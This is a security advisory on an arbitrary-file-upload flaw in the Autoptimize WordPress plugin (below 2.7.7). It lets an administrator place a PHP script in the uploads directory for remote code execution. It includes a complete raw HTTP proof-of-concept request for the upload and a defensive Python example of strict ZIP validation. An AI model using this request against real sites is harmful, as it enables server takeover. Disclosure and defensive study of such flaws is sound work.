The ao_ccss_import AJAX call does not verify that the uploaded file is a legitimate Zip archive (the client-declared Content-Type and filename are trusted), allowing high-privilege users (administrators) to upload arbitrary files such as PHP scripts into the uploads directory, leading to remote code execution (RCE).
Proof of concept (video): https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080
Content-Length: 504
Connection: close
Cookie: [Admin Cookies]

-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/zip

-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="action"

ao_ccss_import
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="ao_ccss_import_nonce"

6df2d6b321
-----------------------------161325441624547204062709166080--
```

Even if the request results in an HTTP 500 error (for example when the PHP ZipArchive extension is not installed), the file has already been written to /wp-content/uploads/ao_ccss/rce.php.
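The request above works because the handler accepts the part's declared `Content-Type: application/zip` and filename at face value. The following example (written for this page, not Autoptimize's own code) contrasts that kind of trust with a check that only passes genuine, well-formed archives. `naive_accepts` is an illustrative stand-in for trusting the client's Content-Type, not the plugin's actual logic; `PHP_PAYLOAD` and the archive contents are constructed inputs, and `build_multipart` only reproduces the shape of the request shown above.

```python
# Added example, not the plugin's code: why a client-declared Content-Type
# is not proof of a ZIP, and what a real validation step looks like.
import io
import zipfile

# Constructed placeholder standing in for the "rce.php" part of the request
# above; harmless content, the point is simply that it is not a ZIP.
PHP_PAYLOAD = b"<?php /* constructed placeholder, not a ZIP */ ?>\n"

# Local file header, or end-of-central-directory for an empty archive.
ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06")


def naive_accepts(content_type: str) -> bool:
    """Illustrative stand-in (assumption, not the plugin's code) for an upload
    handler that trusts the client-supplied part Content-Type."""
    return content_type == "application/zip"


def strict_accepts(filename: str, data: bytes) -> bool:
    """Accept only a well-formed ZIP regardless of what the client claimed:
    extension, magic bytes, CRC check of every member, safe member names."""
    if not filename.lower().endswith(".zip"):
        return False
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if zf.testzip() is not None:  # name of first corrupt member, else None
                return False
            for name in zf.namelist():
                parts = name.replace("\\", "/").split("/")
                if name.startswith("/") or ".." in parts:
                    return False  # member would escape the extraction directory
    except zipfile.BadZipFile:
        return False
    return True


def make_zip(entries: dict) -> bytes:
    """Build an in-memory ZIP from {member_name: bytes} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_multipart(boundary: str, fields: dict, file_name: str,
                    file_type: str, file_data: bytes) -> bytes:
    """Assemble a multipart/form-data body in the same shape as the request
    above: one 'file' part followed by plain fields (action, nonce)."""
    sep = ("--" + boundary).encode()
    out = [
        sep,
        b'Content-Disposition: form-data; name="file"; filename="%s"' % file_name.encode(),
        b"Content-Type: " + file_type.encode(),
        b"",
        file_data,
    ]
    for key, value in fields.items():
        out += [sep, b'Content-Disposition: form-data; name="%s"' % key.encode(), b"", value.encode()]
    out += [sep + b"--", b""]
    return b"\r\n".join(out)


if __name__ == "__main__":
    fields = {"action": "ao_ccss_import", "ao_ccss_import_nonce": "6df2d6b321"}
    body = build_multipart("----boundary", fields, "rce.php", "application/zip", PHP_PAYLOAD)
    print("naive check accepts rce.php:", naive_accepts("application/zip"))
    print("strict check accepts rce.php:", strict_accepts("rce.php", PHP_PAYLOAD))
    print("strict check accepts real zip:", strict_accepts("import.zip", make_zip({"home.css": b"body{margin:0}"})))
```

The strict check is what the import handler should do before the upload touches disk; note that a file written first and validated afterwards is exactly the failure the advisory describes, since a 500 during ZipArchive handling still leaves the file in place.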
| CPE | Name | Operator | Version |
|---|---|---|---|
| | autoptimize | lt | 2.7.7 |